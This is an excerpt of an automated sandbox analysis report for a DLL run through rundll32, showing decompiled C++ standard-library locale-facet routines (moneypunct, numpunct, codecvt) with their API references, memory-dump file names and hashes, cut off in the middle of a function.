0x6e20f6ef
0x6e20f6f1
0x6e20f6f7
0x6e20f6fd
0x6e20f705
0x6e20f708
0x6e20f745
0x6e20f753
0x6e20f758
0x6e20f760
0x6e20f76a
0x6e20f76f
0x6e20f77a
0x6e20f77e
0x6e20f781
0x6e20f786
0x6e20f78f
0x6e20f791
0x6e20f793
0x6e20f7d8
0x6e20f7db
0x6e20f7e7
0x6e20f795
0x6e20f795
0x6e20f797
0x6e20f79d
0x6e20f7a3
0x6e20f7ab
0x6e20f7ae
0x6e20f7eb
0x6e20f7f9
0x6e20f7fe
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f835
0x6e20f837
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797
0x6e20f70a
0x6e20f70a
0x6e20f70d
0x6e20f711
0x6e20f715
0x6e20f722
0x6e20f72a
0x6e20f72c
0x00000000
0x6e20f72c
0x6e20f6f3
0x6e20f6f3
0x00000000
0x6e20f6f3
0x6e20f6f1
0x6e20f664
0x6e20f664
0x6e20f667
0x6e20f66b
0x6e20f66f
0x6e20f67c
0x6e20f684
0x6e20f686
0x00000000
0x6e20f686
0x6e20f64d
0x6e20f64d
0x00000000
0x6e20f64d
0x6e20f64b
0x6e20f5be
0x6e20f5be
0x6e20f5c1
0x6e20f5c5
0x6e20f5c9
0x6e20f5d6
0x6e20f5de
0x6e20f5e0
0x00000000
0x6e20f5e0
0x6e20f5a7
0x6e20f5a7
0x00000000
0x6e20f5a7
0x6e20f5a5

APIs

__EH_prolog3.LIBCMT ref: 6E20F56E
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F578
int.LIBCPMT ref: 6E20F58F

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E20F5B2
std::_Facet_Register.LIBCPMT ref: 6E20F5C9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F5E9
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F607

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 0d964810bfd792dfd90f7f1dbdabeb84099d0821db2dab1f33aed50f754c40d3
Instruction ID: 4430a788135ba6fe5c0d3a1d7bd1b584371bfa209c41759e8d9901a041af72ae
Opcode Fuzzy Hash: 0d964810bfd792dfd90f7f1dbdabeb84099d0821db2dab1f33aed50f754c40d3
Instruction Fuzzy Hash: 4E11067991051E8FCF05DFE4C894AEEB77BBF94718F240918E4216B2D0DB749A84C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A2F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E6E20A2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t52 =  *0x6e2c6cd4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6E1E161C(0x6e2c6cc0);
				_t40 = _a8;
				_t22 = E6E1E171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20AB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6E1E1438(_t44);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6e26ba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6E206FD3(__eflags, _t50);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6e2c6cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}

0x6e20a2f8
0x6e20a302
0x6e20a307
0x6e20a312
0x6e20a316
0x6e20a319
0x6e20a31e
0x6e20a322
0x6e20a327
0x6e20a32b
0x6e20a370
0x6e20a373
0x6e20a37f
0x6e20a32d
0x6e20a32f
0x6e20a335
0x6e20a33b
0x6e20a343
0x6e20a346
0x6e20a380
0x6e20a383
0x6e20a391
0x6e20a396
0x6e20a39a
0x6e20a39e
0x6e20a3a3
0x6e20a3a6
0x6e20a3ad
0x6e20a348
0x6e20a348
0x6e20a34b
0x6e20a34f
0x6e20a353
0x6e20a360
0x6e20a368
0x6e20a36a
0x00000000
0x6e20a36a
0x6e20a331
0x6e20a331
0x00000000
0x6e20a331
0x6e20a32f

APIs

__EH_prolog3.LIBCMT ref: 6E20A2F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E20A302
int.LIBCPMT ref: 6E20A319

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

numpunct.LIBCPMT ref: 6E20A33C
std::_Facet_Register.LIBCPMT ref: 6E20A353
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A373
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20A391

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 4874b7eead0ef606ae9065d7341ae4be5de678551fec6b4eda4d2aeb5f8608c6
Instruction ID: 7e277367ff80e61130ca7e8184fd0f73f595a43bfe6d12f322f8be67388d697a
Opcode Fuzzy Hash: 4874b7eead0ef606ae9065d7341ae4be5de678551fec6b4eda4d2aeb5f8608c6
Instruction Fuzzy Hash: 2A1106B591052D8FCF04DBE0C898AEDB77BAF45714F540908E5106B2D0DF74AA44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A059, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20A059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				void* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t103;
				void* _t116;
				void* _t129;
				intOrPtr* _t196;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				void* _t224;

				_t212 = __edx;
				_t161 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t220 =  *0x6e2c6cd8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t220;
				_t77 = E6E1E161C(0x6e2c6cc4);
				_t164 = _a8;
				_t78 = E6E1E171B(_a8, _t77);
				_t214 = _t78;
				if(_t78 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t214);
				} else {
					if(_t220 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20A96A(__ebx, _t164, __edx, _t214, _t220) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t214, _t220, 0x14);
							E6E206653( &_v20, 0);
							_t221 =  *0x6e2c6cc8; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t221;
							_t90 = E6E1E161C(0x6e2c6b38);
							_t171 = _a8;
							_t215 = E6E1E171B(_a8, _t90);
							__eflags = _t215;
							if(_t215 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t215);
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20A9D2(_t161, _t171, __edx, _t215, _t221) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t161, _t215, _t221, 0x14);
										E6E206653( &_v20, 0);
										_t222 =  *0x6e2c6ccc; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t222;
										_t103 = E6E1E161C(0x6e2c6cb8);
										_t178 = _a8;
										_t216 = E6E1E171B(_a8, _t103);
										__eflags = _t216;
										if(_t216 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t216);
										} else {
											__eflags = _t222;
											if(_t222 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AA38(_t161, _t178, __edx, _t216, _t222) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438( &_v32);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t161, _t216, _t222, 0x14);
													E6E206653( &_v20, 0);
													_t223 =  *0x6e2c6cd0; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t223;
													_t116 = E6E1E161C(0x6e2c6cbc);
													_t185 = _a8;
													_t217 = E6E1E171B(_a8, _t116);
													__eflags = _t217;
													if(_t217 != 0) {
														L26:
														E6E2066BA( &_v20);
														return E6E220075(_t217);
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E20AAA0(_t161, _t185, _t212, _t217, _t223) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438( &_v32);
																E6E223D74( &_v32, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t161, _t217, _t223, 0x14);
																E6E206653( &_v20, 0);
																_t224 =  *0x6e2c6cd4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t224;
																_t129 = E6E1E161C(0x6e2c6cc0);
																_t192 = _a8;
																_t218 = E6E1E171B(_a8, _t129);
																__eflags = _t218;
																if(_t218 != 0) {
																	L33:
																	E6E2066BA( &_v20);
																	return E6E220075(_t218);
																} else {
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E6E20AB08(_t161, _t192, _t212, _t218, _t224) - 0xffffffff;
																		if(__eflags == 0) {
																			_t196 =  &_v32;
																			E6E1E1438(_t196);
																			E6E223D74( &_v32, 0x6e2c3504);
																			asm("int3");
																			_push(_t196);
																			 *((intOrPtr*)(_t196 + 4)) = _v12;
																			_v28 = _t196;
																			 *_t196 = 0x6e26ba24;
																			return _t196;
																		} else {
																			_t218 = _v16;
																			_v16 = _t218;
																			_v4 = 1;
																			E6E206FD3(__eflags, _t218);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 4))))();
																			 *0x6e2c6cd4 = _t218;
																			goto L33;
																		}
																	} else {
																		_t218 = _t224;
																		goto L33;
																	}
																}
															} else {
																_t217 = _v16;
																_v16 = _t217;
																_v4 = 1;
																E6E206FD3(__eflags, _t217);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4))))();
																 *0x6e2c6cd0 = _t217;
																goto L26;
															}
														} else {
															_t217 = _t223;
															goto L26;
														}
													}
												} else {
													_t216 = _v16;
													_v16 = _t216;
													_v4 = 1;
													E6E206FD3(__eflags, _t216);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t216 + 4))))();
													 *0x6e2c6ccc = _t216;
													goto L19;
												}
											} else {
												_t216 = _t222;
												goto L19;
											}
										}
									} else {
										_t215 = _v16;
										_v16 = _t215;
										_v4 = 1;
										E6E206FD3(__eflags, _t215);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t215 + 4))))();
										 *0x6e2c6cc8 = _t215;
										goto L12;
									}
								} else {
									_t215 = _t221;
									goto L12;
								}
							}
						} else {
							_t214 = _v16;
							_v16 = _t214;
							_v4 = 1;
							E6E206FD3(__eflags, _t214);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t214 + 4))))();
							 *0x6e2c6cd8 = _t214;
							goto L5;
						}
					} else {
						_t214 = _t220;
						goto L5;
					}
				}
			}

0x6e20a059
0x6e20a059
0x6e20a060
0x6e20a06a
0x6e20a06f
0x6e20a07a
0x6e20a07e
0x6e20a081
0x6e20a086
0x6e20a08a
0x6e20a08f
0x6e20a093
0x6e20a0d8
0x6e20a0db
0x6e20a0e7
0x6e20a095
0x6e20a097
0x6e20a09d
0x6e20a0a3
0x6e20a0ab
0x6e20a0ae
0x6e20a0eb
0x6e20a0f9
0x6e20a0fe
0x6e20a106
0x6e20a110
0x6e20a115
0x6e20a120
0x6e20a124
0x6e20a127
0x6e20a12c
0x6e20a135
0x6e20a137
0x6e20a139
0x6e20a17e
0x6e20a181
0x6e20a18d
0x6e20a13b
0x6e20a13b
0x6e20a13d
0x6e20a143
0x6e20a149
0x6e20a151
0x6e20a154
0x6e20a191
0x6e20a19f
0x6e20a1a4
0x6e20a1ac
0x6e20a1b6
0x6e20a1bb
0x6e20a1c6
0x6e20a1ca
0x6e20a1cd
0x6e20a1d2
0x6e20a1db
0x6e20a1dd
0x6e20a1df
0x6e20a224
0x6e20a227
0x6e20a233
0x6e20a1e1
0x6e20a1e1
0x6e20a1e3
0x6e20a1e9
0x6e20a1ef
0x6e20a1f7
0x6e20a1fa
0x6e20a237
0x6e20a245
0x6e20a24a
0x6e20a252
0x6e20a25c
0x6e20a261
0x6e20a26c
0x6e20a270
0x6e20a273
0x6e20a278
0x6e20a281
0x6e20a283
0x6e20a285
0x6e20a2ca
0x6e20a2cd
0x6e20a2d9
0x6e20a287
0x6e20a287
0x6e20a289
0x6e20a28f
0x6e20a295
0x6e20a29d
0x6e20a2a0
0x6e20a2dd
0x6e20a2eb
0x6e20a2f0
0x6e20a2f8
0x6e20a302
0x6e20a307
0x6e20a312
0x6e20a316
0x6e20a319
0x6e20a31e
0x6e20a327
0x6e20a329
0x6e20a32b
0x6e20a370
0x6e20a373
0x6e20a37f
0x6e20a32d
0x6e20a32d
0x6e20a32f
0x6e20a335
0x6e20a33b
0x6e20a343
0x6e20a346
0x6e20a380
0x6e20a383
0x6e20a391
0x6e20a396
0x6e20a39a
0x6e20a39e
0x6e20a3a3
0x6e20a3a6
0x6e20a3ad
0x6e20a348
0x6e20a348
0x6e20a34b
0x6e20a34f
0x6e20a353
0x6e20a360
0x6e20a368
0x6e20a36a
0x00000000
0x6e20a36a
0x6e20a331
0x6e20a331
0x00000000
0x6e20a331
0x6e20a32f
0x6e20a2a2
0x6e20a2a2
0x6e20a2a5
0x6e20a2a9
0x6e20a2ad
0x6e20a2ba
0x6e20a2c2
0x6e20a2c4
0x00000000
0x6e20a2c4
0x6e20a28b
0x6e20a28b
0x00000000
0x6e20a28b
0x6e20a289
0x6e20a1fc
0x6e20a1fc
0x6e20a1ff
0x6e20a203
0x6e20a207
0x6e20a214
0x6e20a21c
0x6e20a21e
0x00000000
0x6e20a21e
0x6e20a1e5
0x6e20a1e5
0x00000000
0x6e20a1e5
0x6e20a1e3
0x6e20a156
0x6e20a156
0x6e20a159
0x6e20a15d
0x6e20a161
0x6e20a16e
0x6e20a176
0x6e20a178
0x00000000
0x6e20a178
0x6e20a13f
0x6e20a13f
0x00000000
0x6e20a13f
0x6e20a13d
0x6e20a0b0
0x6e20a0b0
0x6e20a0b3
0x6e20a0b7
0x6e20a0bb
0x6e20a0c8
0x6e20a0d0
0x6e20a0d2
0x00000000
0x6e20a0d2
0x6e20a099
0x6e20a099
0x00000000
0x6e20a099
0x6e20a097

APIs

__EH_prolog3.LIBCMT ref: 6E20A060
std::_Lockit::_Lockit.LIBCPMT ref: 6E20A06A
int.LIBCPMT ref: 6E20A081

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

codecvt.LIBCPMT ref: 6E20A0A4
std::_Facet_Register.LIBCPMT ref: 6E20A0BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A0DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20A0F9

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: fb2974a2acd57bbc508ef8313825e0e52bf9b456f86d2aebb9acbe63624bdece
Instruction ID: 962cb3cc37723b47a9a2c980b112aa3f0b7d4fa8a928716d4613960256540487
Opcode Fuzzy Hash: fb2974a2acd57bbc508ef8313825e0e52bf9b456f86d2aebb9acbe63624bdece
Instruction Fuzzy Hash: 9111C6B691052DDBCF01DBE4C898AEDB77BBF44B15F544908E4106B2D0DFB49A48C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F183, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F183(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;

				_t756 = __edx;
				_t575 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t814 - 0x14, 0);
				_t777 =  *0x6e2c6de8; // 0x0
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6E1E161C(0x6e2c6d94);
				_t578 =  *((intOrPtr*)(_t814 + 8));
				_t266 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6E2066BA(_t814 - 0x14);
					return E6E220075(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6E210EB7(__ebx, _t578, __edx, _t758, _t777) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t814 - 0x20);
							E6E223D74(_t814 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t758, _t777, 0x14);
							E6E206653(_t814 - 0x14, 0);
							_t778 =  *0x6e2c6db8; // 0x0
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6E1E161C(0x6e2c6d6c);
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6E2066BA(_t814 - 0x14);
								return E6E220075(_t759);
							} else {
								__eflags = _t778;
								if(_t778 == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6E210F1F(_t575, _t585, __edx, _t759, _t778) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t814 - 0x20);
										E6E223D74(_t814 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t575, _t759, _t778, 0x14);
										E6E206653(_t814 - 0x14, 0);
										_t779 =  *0x6e2c6dec; // 0x0
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6E1E161C(0x6e2c6d98);
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6E2066BA(_t814 - 0x14);
											return E6E220075(_t760);
										} else {
											__eflags = _t779;
											if(_t779 == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6E210F87(_t575, _t592, __edx, _t760, _t779) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t814 - 0x20);
													E6E223D74(_t814 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t575, _t760, _t779, 0x14);
													E6E206653(_t814 - 0x14, 0);
													_t780 =  *0x6e2c6dbc; // 0x0
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6E1E161C(0x6e2c6d70);
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6E2066BA(_t814 - 0x14);
														return E6E220075(_t761);
													} else {
														__eflags = _t780;
														if(_t780 == 0) {
